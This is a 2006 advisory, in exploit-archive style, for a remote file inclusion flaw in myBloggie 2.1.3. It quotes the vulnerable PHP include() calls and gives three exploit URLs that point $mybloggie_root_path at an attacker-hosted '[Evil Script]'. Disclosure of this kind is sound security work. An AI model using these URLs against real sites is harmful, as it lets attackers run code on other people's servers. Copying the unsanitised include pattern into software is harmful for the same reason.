myBloggie <= 2.1.3 (mybloggie_root_path) Remote File Inclusion Vulnerability
-----------------------------------------------------------------------------------------
myBloggie 2.1.3 mybloggie_root_path Remote File Inclusion
-----------------------------------------------------------------------------------------
Author : Sh3ll
Date : 2006/04/29
Location : Iran - Tehran
HomePage : http://www.sh3ll.ir
Email : sh3ll[at]sh3ll[dot]ir
Critical Level : Dangerous
-----------------------------------------------------------------------------------------
Affected Software Description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application : myBloggie
version : 2.1.3
URL : http://www.mywebland.com , http://mybloggie.mywebland.com
Description :
myBloggie is considered one of the most simple, user-friendliest yet packed
with features Weblog system available to date.
-----------------------------------------------------------------------------------------
Vulnerabilities:
~~~~~~~~~~~~~~~
in admin.php , index.php & db.php We Found Vulnerability Scripts
----------------------------------------admin.php----------------------------------------
....
<?php
include($mybloggie_root_path.'spacer6.php');
?>
...
----------------------------------------index.php----------------------------------------
....
<?php
}
if (!isset($mode)) {
include($mybloggie_root_path.'blog.php');
}
$template->pparse('sidevert');
}
// End right sidemenu condition
// Sidemenu menu items. You can change the menu item order here
include($mybloggie_root_path.'calendar.php');
include($mybloggie_root_path.'spacer.php');
include($mybloggie_root_path.'category.php');
include($mybloggie_root_path.'spacer.php');
include($mybloggie_root_path.'recent.php');
include($mybloggie_root_path.'spacer.php');
include($mybloggie_root_path.'archives.php');
include($mybloggie_root_path.'spacer.php');
include($mybloggie_root_path.'user.php');
include($mybloggie_root_path.'spacer.php');
if ($search) {
include($mybloggie_root_path.'searchform.php');
include($mybloggie_root_path.'spacer.php');
}
...
-------------------------------------------db.php----------------------------------------
....
<?php
include($mybloggie_root_path .'includes/mysql.php');
?>
...
-----------------------------------------------------------------------------------------
Exploit:
~~~~~~~
http://www.target.com/[myBloggie]/admin.php?mybloggie_root_path=[Evil Script]
http://www.target.com/[myBloggie]/index.php?mybloggie_root_path=[Evil Script]
http://www.target.com/[myBloggie]/includes/db.php?mybloggie_root_path=[Evil
Script]
Solution:
~~~~~~~~
Sanitize Variabel $mybloggie_root_path in admin.php , index.php & db.php
-----------------------------------------------------------------------------------------
Shoutz:
~~~~~~
~ Special Greetz to My Best Friend N4sh3n4s & My GF Atena
~ To All My Friends in Xmors - Aria - Hackerz & Other Iranian Cyber Teams